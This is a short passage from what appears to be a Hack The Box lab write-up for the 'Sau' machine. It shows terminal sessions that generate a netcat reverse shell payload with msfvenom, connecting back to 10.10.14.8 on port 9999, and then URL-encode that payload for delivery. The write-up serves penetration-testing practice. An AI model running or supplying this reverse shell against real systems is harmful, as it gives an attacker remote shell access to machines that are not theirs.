msfvenom


┌──(kali㉿kali)-[~/archive/htb/labs/sau]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.8 LPORT=9999 
[-] no platform was selected, choosing msf::Module::Platform::Unix from the payload
[-] no arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
payload size: 88 bytes
mkfifo /tmp/lnar; nc 10.10.14.8 9999 0</tmp/lnar | /bin/sh >/tmp/lnar 2>&1; rm /tmp/lnar

msfvenom generated a reverse shell payload

hURL


┌──(kali㉿kali)-[~/archive/htb/labs/sau]
└─$ hurl -U 'mkfifo /tmp/lnar; nc 10.10.14.8 9999 0</tmp/lnar | /bin/sh >/tmp/lnar 2>&1; rm /tmp/lnar'            
 
Original    :: mkfifo /tmp/lnar; nc 10.10.14.8 9999 0</tmp/lnar | /bin/sh >/tmp/lnar 2>&1; rm /tmp/lnar
URL ENcoded :: mkfifo%20%2Ftmp%2Flnar%3B%20nc%2010.10.14.8%209999%200%3C%2Ftmp%2Flnar%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Flnar%202%3E%261%3B%20rm%20%2Ftmp%2Flnar

Wrapping it up in the URL format for delivery